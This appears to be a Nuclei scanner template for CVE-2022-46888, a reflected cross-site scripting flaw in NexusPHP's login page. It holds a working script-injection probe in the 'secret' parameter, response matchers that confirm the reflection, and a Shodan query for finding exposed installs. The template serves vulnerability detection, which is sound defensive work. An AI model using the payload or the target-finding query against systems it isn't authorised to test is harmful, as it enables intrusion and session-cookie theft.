49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2022-46888
|
|
|
|
info:
|
|
name: NexusPHP <1.7.33 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..
|
|
reference:
|
|
- https://www.surecloud.com/resources/blog/nexusphp-surecloud-security-review-identifies-authenticated-unauthenticated-vulnerabilities
|
|
- https://github.com/xiaomlove/nexusphp/releases/tag/v1.7.33
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-46888
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-46888
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:nexusphp:nexusphp:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00089
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.favicon.hash:-582931176
|
|
verified: true
|
|
tags: cve,cve2022,nexus,php,nexusphp,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/login.php?secret="><script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'value=""><script>alert(document.domain)</script>">'
|
|
- 'NexusPHP'
|
|
condition: and
|
|
case-insensitive: true
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|